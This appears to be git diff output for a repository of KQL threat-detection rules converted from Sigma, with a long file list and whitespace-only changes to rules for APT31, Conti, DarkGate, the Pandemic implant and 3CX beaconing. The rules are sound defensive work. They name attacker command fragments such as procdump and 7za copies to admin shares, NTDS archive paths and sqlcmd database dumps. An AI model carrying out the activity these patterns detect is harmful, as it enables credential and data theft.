+++++----- .../Persistence/macos_emond_launch_daemon.kql | 22 +++++----- ...d_in_a_potentially_suspicious_document.kql | 22 +++++----- ...ropped_in_the_teams_or_onedrive_folder.kql | 20 ++++----- ...sk_system_power_settings_via_systemctl.kql | 26 +++++------ .../modification_of_ie_registry_settings.kql | 18 ++++---- ...odify_user_shell_folders_startup_value.kql | 18 ++++---- .../monitoring_for_persistence_via_bits.kql | 24 +++++----- ...sexchange_transport_agent_installation.kql | 22 +++++----- 
...enassemblyusagelog_registry_key_tamper.kql | 22 +++++----- .../netntlm_downgrade_attack_registry.kql | 22 +++++----- ..._custom_db_path_registry_configuration.kql | 22 +++++----- ...custom_vbscript_registry_configuration.kql | 22 +++++----- ...ustom_wmi_query_registry_configuration.kql | 22 +++++----- .../new_kernel_driver_via_sc_exe.kql | 22 +++++----- .../new_odbc_driver_registered.kql | 22 +++++----- .../new_service_creation_using_powershell.kql | 24 +++++----- .../new_service_creation_using_sc_exe.kql | 24 +++++----- ...ders_registered_with_uncommon_dll_name.kql | 22 +++++----- .../new_user_created_via_net_exe.kql | 24 +++++----- ...d_via_net_exe_with_never_expire_option.kql | 22 +++++----- ..._privileged_usage_of_reg_or_powershell.kql | 18 ++++---- ...office_application_startup_office_test.kql | 22 +++++----- .../office_macros_warning_disabled.kql | 22 +++++----- ...ientmailrules_setting_enabled_registry.kql | 18 ++++---- ...ook_security_settings_updated_registry.kql | 22 +++++----- .../path_to_screensaver_binary_modified.kql | 22 +++++----- ...tence_via_disk_cleanup_handler_autorun.kql | 28 ++++++------ .../persistence_via_hhctrl_ocx.kql | 22 +++++----- .../persistence_via_new_sip_provider.kql | 22 +++++----- .../persistence_via_sticky_key_backdoor.kql | 24 +++++----- ...persistence_via_typedpaths_commandline.kql | 18 ++++---- ...scalation_via_weak_service_permissions.kql | 18 ++++---- .../potential_appverifui_dll_sideloading.kql | 22 +++++----- .../potential_avkkid_dll_sideloading.kql | 18 ++++---- .../potential_azure_browser_sso_abuse.kql | 24 +++++----- ...inary_or_script_dropper_via_powershell.kql | 22 +++++----- ...tstrike_service_installations_registry.kql | 22 +++++----- .../potential_eacore_dll_sideloading.kql | 22 +++++----- .../potential_edputil_dll_sideloading.kql | 22 +++++----- .../potential_goopdate_dll_sideloading.kql | 24 +++++----- .../potential_iviewers_dll_sideloading.kql | 18 ++++---- .../potential_mfdetours_dll_sideloading.kql | 22 
+++++----- ...rsistence_attempt_via_errorhandler_cmd.kql | 20 ++++----- .../potential_persistence_via_autodialdll.kql | 22 +++++----- ...tential_persistence_via_chm_helper_dll.kql | 18 ++++---- ...ersistence_via_custom_protocol_handler.kql | 22 +++++----- ...ence_via_disk_cleanup_handler_registry.kql | 32 +++++++------- ...ential_persistence_via_dllpathoverride.kql | 18 ++++---- ...ersistence_via_event_viewer_events_asp.kql | 18 ++++---- ..._persistence_via_excel_add_in_registry.kql | 18 ++++---- ...tential_persistence_via_lsa_extensions.kql | 24 +++++----- ...ersistence_via_microsoft_office_add_in.kql | 22 +++++----- ...ce_via_microsoft_office_startup_folder.kql | 24 +++++----- .../potential_persistence_via_mpnotify.kql | 22 +++++----- ...rsistence_via_mycomputer_registry_keys.kql | 22 +++++----- ...stence_via_new_amsi_providers_registry.kql | 22 +++++----- ...ential_persistence_via_notepad_plugins.kql | 24 +++++----- ...potential_persistence_via_outlook_form.kql | 22 +++++----- .../potential_persistence_via_typedpaths.kql | 22 +++++----- ...nce_via_visual_studio_tools_for_office.kql | 22 +++++----- ...ation_via_service_permissions_weakness.kql | 18 ++++---- .../potential_qakbot_registry_activity.kql | 18 ++++---- .../potential_rcdll_dll_sideloading.kql | 18 ++++---- ..._dll_sideloading_from_default_location.kql | 18 ++++---- ..._sideloading_from_non_default_location.kql | 22 +++++----- .../potential_roboform_dll_sideloading.kql | 22 +++++----- ...ll_context_menu_scan_command_tampering.kql | 18 ++++---- ...otential_shelldispatch_dll_sideloading.kql | 22 +++++----- ...m_database_persistence_via_sdbinst_exe.kql | 20 ++++----- .../potential_smadhook_dll_sideloading.kql | 22 +++++----- ...ential_solidpdfcreator_dll_sideloading.kql | 18 ++++---- ...picious_powershell_module_file_created.kql | 22 +++++----- ...ous_registry_file_imported_via_reg_exe.kql | 22 +++++----- ..._rdp_related_registry_keys_via_reg_exe.kql | 18 ++++---- 
.../potential_vivaldi_elf_dll_sideloading.kql | 18 ++++---- .../potential_waveedit_dll_sideloading.kql | 22 +++++----- ...al_webshell_creation_on_static_website.kql | 22 +++++----- .../potential_wwlib_dll_sideloading.kql | 18 ++++---- ...ious_child_process_of_keyscrambler_exe.kql | 18 ++++---- ...esktop_background_change_using_reg_exe.kql | 24 +++++----- ...desktop_background_change_via_registry.kql | 24 +++++----- ...picious_malware_callback_communication.kql | 18 ++++---- ...s_malware_callback_communication_linux.kql | 18 ++++---- ...hell_script_creation_in_profile_folder.kql | 24 +++++----- .../powershell_module_file_created.kql | 22 +++++----- ...file_created_by_non_powershell_process.kql | 18 ++++---- .../powershell_profile_modification.kql | 22 +++++----- ...hell_script_dropped_via_powershell_exe.kql | 22 +++++----- ...er_creation_by_non_sysinternals_binary.kql | 24 +++++----- ...er_creation_by_non_sysinternals_binary.kql | 22 +++++----- .../pua_system_informer_execution.kql | 22 +++++----- ..._winnti_playbook_registry_manipulation.kql | 18 ++++---- .../Persistence/reg_add_suspicious_paths.kql | 22 +++++----- .../register_new_ifiltre_for_persistence.kql | 24 +++++----- .../registry_explorer_policy_modification.kql | 22 +++++----- .../registry_hide_function_from_user.kql | 22 +++++----- ...gistry_manipulation_via_wmi_stdregprov.kql | 26 +++++------ ..._modification_to_hidden_file_extension.kql | 22 +++++----- .../registry_modification_via_regini_exe.kql | 22 +++++----- ...ccess_tool_anydesk_incoming_connection.kql | 22 +++++----- ...l_screenconnect_installation_execution.kql | 22 +++++----- ...m_viewer_session_started_on_linux_host.kql | 24 +++++----- ...m_viewer_session_started_on_macos_host.kql | 24 +++++----- ...viewer_session_started_on_windows_host.kql | 24 +++++----- ..._potential_com_hijacking_registry_keys.kql | 24 +++++----- ...ctedadminmode_registry_value_tampering.kql | 22 +++++----- ..._registry_value_tampering_proccreation.kql | 22 +++++----- 
...un_once_task_configuration_in_registry.kql | 22 +++++----- ...sk_execution_as_configured_in_registry.kql | 18 ++++---- ...sabled_via_minint_registry_key_process.kql | 26 +++++------ ...d_via_minint_registry_key_registry_set.kql | 26 +++++------ .../service_binary_in_suspicious_folder.kql | 18 ++++---- ...dacl_abuse_to_hide_services_via_sc_exe.kql | 18 ++++---- ...curity_descriptor_tampering_via_sc_exe.kql | 18 ++++---- KQL/rules/Persistence/servicedll_hijack.kql | 26 +++++------ .../shell_open_registry_keys_manipulation.kql | 18 ++++---- KQL/rules/Persistence/shimcache_flush.kql | 18 ++++---- .../startup_item_file_created_macos.kql | 26 +++++------ .../suspicious_aspx_file_drop_by_exchange.kql | 18 ++++---- ...nstance_executed_with_custom_extension.kql | 18 ++++---- ...spicious_debugger_registration_cmdline.kql | 18 ++++---- ..._activity_from_fake_recycle_bin_folder.kql | 18 ++++---- .../suspicious_file_drop_by_exchange.kql | 18 ++++---- ...s_file_write_to_webapps_root_directory.kql | 20 ++++----- .../suspicious_iis_module_registration.kql | 22 +++++----- .../suspicious_new_service_creation.kql | 22 +++++----- ...ious_printer_driver_empty_manufacturer.kql | 22 +++++----- ...spicious_process_by_web_server_process.kql | 22 +++++----- ...execution_from_fake_recycle_bin_folder.kql | 22 +++++----- ...y_modification_from_ads_via_regini_exe.kql | 18 ++++---- ...uspicious_screensave_change_by_reg_exe.kql | 24 +++++----- .../suspicious_service_path_modification.kql | 22 +++++----- .../suspicious_vboxdrvinst_exe_parameters.kql | 26 +++++------ ...nt_connection_history_cleared_registry.kql | 18 ++++---- ...rust_access_disable_for_vbapplications.kql | 22 +++++----- ..._bypass_via_windows_directory_spoofing.kql | 24 +++++----- .../Persistence/uac_bypass_with_fake_dll.kql | 22 +++++----- ...fi_persistence_via_wpbbin_filecreation.kql | 22 +++++----- ...persistence_via_wpbbin_processcreation.kql | 22 +++++----- ..._database_installation_via_sdbinst_exe.kql | 20 ++++----- 
...icrosoft_office_trusted_location_added.kql | 22 +++++----- ...allation_attempt_using_add_appxpackage.kql | 22 +++++----- .../unusual_child_process_of_dns_exe.kql | 18 ++++---- .../unusual_file_deletion_by_dns_exe.kql | 18 ++++---- .../unusual_file_modification_by_dns_exe.kql | 18 ++++---- .../user_added_to_admin_group_via_dscl.kql | 22 +++++----- ...r_added_to_admin_group_via_dseditgroup.kql | 22 +++++----- ...r_added_to_admin_group_via_sysadminctl.kql | 22 +++++----- ...vscode_powershell_profile_modification.kql | 22 +++++----- ...digest_credguard_registry_modification.kql | 22 +++++----- .../wdigest_enable_uselogoncredential.kql | 18 ++++---- ...l_detection_with_command_line_keywords.kql | 18 ++++---- .../webshell_hacking_activity_patterns.kql | 22 +++++----- .../webshell_tool_reconnaissance_activity.kql | 18 ++++---- ...inlogon_allowmultipletssessions_enable.kql | 26 +++++------ .../wmi_persistence_script_event_consumer.kql | 24 +++++----- .../Persistence/wmi_persistence_security.kql | 22 +++++----- ...d_port_monitor_persistence_in_registry.kql | 20 ++++----- ...curity_descriptor_tampering_via_sc_exe.kql | 18 ++++---- .../atbroker_registry_change.kql | 22 +++++----- .../bypass_uac_using_delegateexecute.kql | 18 ++++---- .../bypass_uac_using_event_viewer.kql | 18 ++++---- .../bypass_uac_using_silentcleanup_task.kql | 22 +++++----- .../bypass_uac_via_cmstp.kql | 22 +++++----- .../bypass_uac_via_wsreset_exe.kql | 22 +++++----- ...le_association_to_executable_via_assoc.kql | 20 ++++----- ...nge_default_file_association_via_assoc.kql | 24 +++++----- ...ng_service_imagepath_value_via_reg_exe.kql | 22 +++++----- .../classes_autorun_keys_modification.kql | 24 +++++----- .../com_hijacking_via_treatas.kql | 22 +++++----- ..._of_default_system_clsid_default_value.kql | 22 +++++----- .../common_autorun_keys_modification.kql | 24 +++++----- .../control_panel_items.kql | 18 ++++---- ...created_files_by_microsoft_sync_center.kql | 18 ++++---- 
...ion_exe_for_service_with_unquoted_path.kql | 20 ++++----- ...werfault_exe_wer_dll_in_unusual_folder.kql | 18 ++++---- ...ntcontrolset_autorun_keys_modification.kql | 24 +++++----- ...rrentversion_autorun_keys_modification.kql | 24 +++++----- ...ntversion_nt_autorun_keys_modification.kql | 24 +++++----- ..._rdp_port_changed_to_non_standard_port.kql | 22 +++++----- ...curity_descriptor_tampering_via_sc_exe.kql | 18 ++++---- .../dhcp_callout_dll_installation.kql | 18 ++++---- .../direct_autorun_keys_modification.kql | 26 +++++------ ...execution_via_register_cimprovider_exe.kql | 18 ++++---- .../dll_load_via_lsass.kql | 18 ++++---- ...dll_sideloading_by_vmware_xfer_utility.kql | 22 +++++----- .../dllhost_exe_execution_anomaly.kql | 22 +++++----- .../explorer_nouaccheck_flag.kql | 24 +++++----- .../fax_service_dll_search_order_hijack.kql | 22 +++++----- ...on_in_suspicious_directory_by_msdt_exe.kql | 18 ++++---- .../guest_account_enabled_via_sysadminctl.kql | 18 ++++---- ...cktool_crackmapexec_execution_patterns.kql | 18 ++++---- ..._dinjector_powershell_cradle_execution.kql | 22 +++++----- .../hacktool_hollowreaper_execution.kql | 20 ++++----- .../hacktool_impersonate_execution.kql | 18 ++++---- .../hacktool_sharpdpapi_execution.kql | 20 ++++----- .../hacktool_sharpersist_execution.kql | 18 ++++---- .../hacktool_sharpimpersonation_execution.kql | 18 ++++---- .../hacktool_winpeas_execution.kql | 22 +++++----- ...or_privilege_escalation_tool_execution.kql | 20 ++++----- ...net_explorer_autorun_keys_modification.kql | 24 +++++----- ...h_agent_daemon_execution_via_launchctl.kql | 22 +++++----- .../linux_sudo_chroot_execution.kql | 28 ++++++------ ..._center_suspicious_network_connections.kql | 18 ++++---- .../narrator_s_feedback_hub_persistence.kql | 18 ++++---- ...k_connection_initiated_via_notepad_exe.kql | 26 +++++------ ...ripteventconsumer_created_via_wmic_exe.kql | 22 +++++----- .../new_custom_shim_database_created.kql | 24 +++++----- 
...new_dns_serverlevelplugindll_installed.kql | 18 ++++---- ...evelplugindll_installed_via_dnscmd_exe.kql | 18 ++++---- ..._registered_from_a_suspicious_location.kql | 18 ++++---- .../new_outlook_macro_created.kql | 22 +++++----- ..._run_key_pointing_to_suspicious_folder.kql | 22 +++++----- .../office_autorun_keys_modification.kql | 24 +++++----- ...cution_without_warning_setting_enabled.kql | 22 +++++----- .../password_set_to_never_expire_via_wmi.kql | 22 +++++----- .../persistence_via_cron_files.kql | 22 +++++----- .../persistence_via_sudoers_files.kql | 22 +++++----- ..._hijacking_via_treatas_subkey_registry.kql | 22 +++++----- ...jection_or_execution_using_tracker_exe.kql | 18 ++++---- ...ential_dll_sideloading_of_dbgmodel_dll.kql | 22 +++++----- ...potential_dll_sideloading_of_mpsvc_dll.kql | 22 +++++----- ...ential_dll_sideloading_of_mscorsvc_dll.kql | 22 +++++----- ...tial_dll_sideloading_using_coregen_exe.kql | 18 ++++---- ...dll_sideloading_via_deviceenroller_exe.kql | 20 ++++----- ...ential_dll_sideloading_via_vmware_xfer.kql | 22 +++++----- ..._access_via_dll_search_order_hijacking.kql | 18 ++++---- ..._process_code_injection_via_dd_utility.kql | 18 ++++---- .../potential_mpclient_dll_sideloading.kql | 22 +++++----- ..._dll_sideloading_via_defender_binaries.kql | 22 +++++----- ...attempt_via_existing_service_tampering.kql | 18 ++++---- ...nce_attempt_via_run_keys_using_reg_exe.kql | 26 +++++------ .../potential_persistence_using_debugpath.kql | 18 ++++---- ...istence_via_app_paths_default_property.kql | 28 ++++++------ ...via_appcompat_registerapprestart_layer.kql | 26 +++++------ .../potential_persistence_via_globalflags.kql | 18 ++++---- ...sistence_via_logon_scripts_commandline.kql | 22 +++++----- ...persistence_via_logon_scripts_registry.kql | 22 +++++----- ..._via_microsoft_compatibility_appraiser.kql | 20 ++++----- ...ntial_persistence_via_netsh_helper_dll.kql | 18 ++++---- ...sistence_via_netsh_helper_dll_registry.kql | 22 +++++----- 
...utlook_loadmacroprovideronboot_setting.kql | 18 ++++---- .../potential_persistence_via_plistbuddy.kql | 18 ++++---- ...powershell_search_order_hijacking_task.kql | 18 ++++---- ...rsistence_via_scrobj_dll_com_hijacking.kql | 22 +++++----- ...via_shim_database_in_uncommon_location.kql | 18 ++++---- ...istence_via_shim_database_modification.kql | 24 +++++----- ...tion_using_symlink_between_osk_and_cmd.kql | 18 ++++---- ...tential_process_injection_via_msra_exe.kql | 22 +++++----- ...otential_psfactorybuffer_com_hijacking.kql | 18 ++++---- ...istence_attempt_via_dbgmanageddebugger.kql | 22 +++++----- ...sistence_attempt_via_windows_telemetry.kql | 24 +++++----- ...ential_ripzip_attack_on_startup_folder.kql | 22 +++++----- ...istence_install_using_a_scheduled_task.kql | 18 ++++---- ...hortcut_persistence_via_powershell_exe.kql | 28 ++++++------ .../potential_uac_bypass_via_sdclt_exe.kql | 18 ++++---- ...ll_web_access_feature_enabled_via_dism.kql | 22 +++++----- ...istry_persistence_via_explorer_run_key.kql | 18 ++++---- ..._dll_execution_with_uncommon_extension.kql | 22 +++++----- .../renamed_vmnat_exe_execution.kql | 18 ++++---- .../root_account_enable_via_dsenableroot.kql | 18 ++++---- .../rundll32_registered_com_objects.kql | 22 +++++----- ...ially_suspicious_path_via_schtasks_exe.kql | 24 +++++----- ...ation_masquerading_as_system_processes.kql | 22 +++++----- ...th_curl_and_powershell_execution_combo.kql | 26 +++++------ ...xecuting_encoded_payload_from_registry.kql | 22 +++++----- ...d_task_executing_payload_from_registry.kql | 18 ++++---- .../scheduled_task_job_at.kql | 24 +++++----- ...d_taskcache_change_by_uncommon_program.kql | 18 ++++---- ...or_modification_with_system_privileges.kql | 18 ++++---- .../schtasks_from_suspicious_folders.kql | 18 ++++---- ..._privileges_enumeration_via_whoami_exe.kql | 18 ++++---- ...rovider_ssp_added_to_lsa_configuration.kql | 18 ++++---- ...sion_manager_autorun_keys_modification.kql | 24 +++++----- 
...p16_exe_execution_with_custom_lst_file.kql | 26 +++++------ .../startup_folder_file_write.kql | 22 +++++----- .../sticky_key_like_backdoor_execution.kql | 22 +++++----- ...ticky_key_like_backdoor_usage_registry.kql | 22 +++++----- ...ious_autorun_registry_modified_via_wmi.kql | 22 +++++----- ...nd_patterns_in_scheduled_task_creation.kql | 22 +++++----- .../suspicious_desktop_ini_action.kql | 24 +++++----- ...spicious_driver_install_by_pnputil_exe.kql | 26 +++++------ .../suspicious_get_variable_exe_creation.kql | 22 +++++----- .../suspicious_grpconv_execution.kql | 18 ++++---- .../suspicious_gup_usage.kql | 22 +++++----- ...icious_modification_of_scheduled_tasks.kql | 22 +++++----- ...ication_on_the_printer_spooler_service.kql | 18 ++++---- .../suspicious_outlook_macro_created.kql | 22 +++++----- ...icious_powershell_in_registry_run_keys.kql | 22 +++++----- .../suspicious_run_key_from_download.kql | 22 +++++----- ...suspicious_runas_like_flag_combination.kql | 18 ++++---- ...ious_rundll32_invoking_inline_vbscript.kql | 18 ++++---- ...ed_task_creation_involving_temp_folder.kql | 24 +++++----- ...task_creation_via_masqueraded_xml_file.kql | 18 ++++---- ...suspicious_scheduled_task_name_as_guid.kql | 22 +++++----- ...scheduled_task_write_to_system32_tasks.kql | 18 ++++---- ...ious_schtasks_execution_appdata_folder.kql | 18 ++++---- ...sks_schedule_type_with_high_privileges.kql | 22 +++++----- .../suspicious_schtasks_schedule_types.kql | 22 +++++----- ...cious_screensaver_binary_file_creation.kql | 20 ++++----- ...cl_modification_via_set_service_cmdlet.kql | 18 ++++---- ...icious_shim_database_patching_activity.kql | 18 ++++---- .../suspicious_startup_folder_persistence.kql | 26 +++++------ .../suspicious_userinit_child_process.kql | 22 +++++----- .../sysinternals_psservice_execution.kql | 22 +++++----- .../sysinternals_pssuspend_execution.kql | 18 ++++---- ...stem_scripts_autorun_keys_modification.kql | 24 +++++----- .../tasks_folder_evasion.kql | 22 +++++----- 
...cross_ebpf_rootkit_default_persistence.kql | 22 +++++----- .../trustedpath_uac_bypass_pattern.kql | 18 ++++---- .../Privilege Escalation/uac_disabled.kql | 18 ++++---- .../uac_notification_disabled.kql | 22 +++++----- .../uac_secure_desktop_prompt_disabled.kql | 22 +++++----- .../uncommon_userinit_child_process.kql | 22 +++++----- .../user_added_to_highly_privileged_group.kql | 22 +++++----- ...er_added_to_local_administrators_group.kql | 22 +++++----- ...ed_to_root_sudoers_group_using_usermod.kql | 22 +++++----- .../using_settingsynchost_exe_as_lolbin.kql | 18 ++++---- .../vbscript_payload_stored_in_registry.kql | 18 ++++---- ..._exe_execution_from_privileged_process.kql | 18 ++++---- ...vent_log_access_tampering_via_registry.kql | 22 +++++----- ...tings_modification_by_uncommon_process.kql | 22 +++++----- .../winekey_registry_modification.kql | 18 ++++---- .../winlogon_notify_key_logon_persistence.kql | 20 ++++----- ...ar_creating_files_in_startup_locations.kql | 20 ++++----- .../winsock2_autorun_keys_modification.kql | 24 +++++----- .../wmi_backdoor_exchange_transport_agent.kql | 18 ++++---- ...ersistence_command_line_event_consumer.kql | 22 +++++----- ...tence_script_event_consumer_file_write.kql | 22 +++++----- ...node_classes_autorun_keys_modification.kql | 24 +++++----- ...rrentversion_autorun_keys_modification.kql | 24 +++++----- ...rrentversion_autorun_keys_modification.kql | 24 +++++----- .../writing_local_admin_share.kql | 20 ++++----- ...xe_execution_from_non_default_location.kql | 24 +++++----- .../access_of_sudoers_file_content.kql | 22 +++++----- .../Reconnaissance/linux_recon_indicators.kql | 22 +++++----- ...umeration_using_ad_module_proccreation.kql | 22 +++++----- .../print_history_file_contents.kql | 22 +++++----- .../pua_pingcastle_execution.kql | 18 ++++---- ...ion_from_potentially_suspicious_parent.kql | 18 ++++---- .../Reconnaissance/suspicious_git_clone.kql | 18 ++++---- .../suspicious_git_clone_linux.kql | 18 ++++---- 
 .../creation_of_a_diagcab.kql | 22 +++++-----
 .../hacktool_purplesharp_execution.kql | 22 +++++-----
 ...nmanager_service_installation_registry.kql | 18 ++++----
 ...ential_execution_of_sysinternals_tools.kql | 24 +++++-----
 ...l_privilege_escalation_to_local_system.kql | 24 +++++-----
 .../potential_psexec_remote_execution.kql | 18 ++++----
 ...exec_paexec_escalation_to_local_system.kql | 24 +++++-----
 .../pua_csexec_execution.kql | 18 ++++----
 ...ua_sysinternal_tool_execution_registry.kql | 24 +++++-----
 ..._sysinternals_tools_execution_registry.kql | 22 +++++-----
 ...named_sysinternals_debugview_execution.kql | 18 ++++----
 ...of_renamed_sysinternals_tools_registry.kql | 22 +++++-----
 .../suspicious_keyboard_layout_load.kql | 22 +++++-----
 ..._file_created_in_office_startup_folder.kql | 22 +++++-----
 ...renamed_sysinternals_tools_registryset.kql | 22 +++++-----
 .../vhd_image_download_via_browser.kql | 24 +++++-----
 sigma | 1 +
 2226 files changed, 23328 insertions(+), 23327 deletions(-)
 create mode 160000 sigma
diff --git a/KQL/rules-emerging-threats/Collection/apt31_judgement_panda_activity.kql b/KQL/rules-emerging-threats/Collection/apt31_judgement_panda_activity.kql
index a3ff5e5f..58cd05f6 100644
--- a/KQL/rules-emerging-threats/Collection/apt31_judgement_panda_activity.kql
+++ b/KQL/rules-emerging-threats/Collection/apt31_judgement_panda_activity.kql
@@ -1,12 +1,12 @@
-// Title: APT31 Judgement Panda Activity
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-02-21
-// Level: critical
-// Description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.lateral-movement, attack.credential-access, attack.g0128, attack.t1003.001, attack.t1560.001, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: APT31 Judgement Panda Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-02-21
+// Level: critical
+// Description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.lateral-movement, attack.credential-access, attack.g0128, attack.t1003.001, attack.t1560.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "\\aaaa\\procdump64.exe" or ProcessCommandLine contains "\\aaaa\\netsess.exe" or ProcessCommandLine contains "\\aaaa\\7za.exe" or ProcessCommandLine contains "\\c$\\aaaa\\") and (ProcessCommandLine contains "copy \\\\" and ProcessCommandLine contains "c$")) or (ProcessCommandLine contains "ldifde" and ProcessCommandLine contains "-f -n" and ProcessCommandLine contains "eprod.ldf")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Collection/conti_ntds_exfiltration_command.kql b/KQL/rules-emerging-threats/Collection/conti_ntds_exfiltration_command.kql
index 8296109c..aab5306a 100644
--- a/KQL/rules-emerging-threats/Collection/conti_ntds_exfiltration_command.kql
+++ b/KQL/rules-emerging-threats/Collection/conti_ntds_exfiltration_command.kql
@@ -1,10 +1,10 @@
-// Title: Conti NTDS Exfiltration Command
-// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
-// Date: 2021-08-09
-// Level: high
-// Description: Detects a command used by conti to exfiltrate NTDS
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1560, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Conti NTDS Exfiltration Command
+// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
+// Date: 2021-08-09
+// Level: high
+// Description: Detects a command used by conti to exfiltrate NTDS
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560, detection.emerging-threats
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "7za.exe" and ProcessCommandLine contains "\\C$\\temp\\log.zip"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Collection/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql b/KQL/rules-emerging-threats/Collection/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql
index da60e4e6..b2296125 100644
--- a/KQL/rules-emerging-threats/Collection/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql
+++ b/KQL/rules-emerging-threats/Collection/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql
@@ -1,10 +1,10 @@
-// Title: Potential Conti Ransomware Database Dumping Activity Via SQLCmd
-// Author: frack113
-// Date: 2021-08-16
-// Level: high
-// Description: Detects a command used by conti to dump database
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1005, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential Conti Ransomware Database Dumping Activity Via SQLCmd
+// Author: frack113
+// Date: 2021-08-16
+// Level: high
+// Description: Detects a command used by conti to dump database
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1005, detection.emerging-threats
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "sys.sysprocesses" or ProcessCommandLine contains "master.dbo.sysdatabases" or ProcessCommandLine contains "BACKUP DATABASE") and ProcessCommandLine contains " -S localhost " and (FolderPath endswith "\\sqlcmd.exe" or (ProcessCommandLine contains "sqlcmd " or ProcessCommandLine contains "sqlcmd.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql b/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql
index 2aede8b8..b347ed04 100644
--- a/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql
+++ b/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql
@@ -1,13 +1,13 @@
-// Title: DarkGate - Autoit3.EXE File Creation By Uncommon Process
-// Author: Micah Babinski
-// Date: 2023-10-15
-// Level: medium
-// Description: Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe.
-// This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs
-// process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other
-// processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.execution, attack.t1105, attack.t1059, detection.emerging-threats
-
-DeviceFileEvents
+// Title: DarkGate - Autoit3.EXE File Creation By Uncommon Process
+// Author: Micah Babinski
+// Date: 2023-10-15
+// Level: medium
+// Description: Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe.
+// This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs
+// process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other
+// processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.execution, attack.t1105, attack.t1059, detection.emerging-threats
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\Autoit3.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\ExtExport.exe" or InitiatingProcessFolderPath endswith "\\KeyScramblerLogon.exe" or InitiatingProcessFolderPath endswith "\\wmprph.exe") and FolderPath endswith "\\Autoit3.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Command and Control/pandemic_registry_key.kql b/KQL/rules-emerging-threats/Command and Control/pandemic_registry_key.kql
index e0507dbe..b5aced43 100644
--- a/KQL/rules-emerging-threats/Command and Control/pandemic_registry_key.kql
+++ b/KQL/rules-emerging-threats/Command and Control/pandemic_registry_key.kql
@@ -1,10 +1,10 @@
-// Title: Pandemic Registry Key
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017-06-01
-// Level: critical
-// Description: Detects Pandemic Windows Implant
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105, detection.emerging-threats
-
-DeviceRegistryEvents
+// Title: Pandemic Registry Key
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-06-01
+// Level: critical
+// Description: Detects Pandemic Windows Implant
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105, detection.emerging-threats
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\services\\null\\Instance"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Command and Control/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql b/KQL/rules-emerging-threats/Command and Control/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql
index 7a9ee05c..265d4327 100644
--- a/KQL/rules-emerging-threats/Command and Control/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql
+++ b/KQL/rules-emerging-threats/Command and Control/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql
@@ -1,12 +1,12 @@
-// Title: Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-29
-// Level: high
-// Description: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceNetworkEvents
+// Title: Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-29
+// Level: high
+// Description: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceNetworkEvents
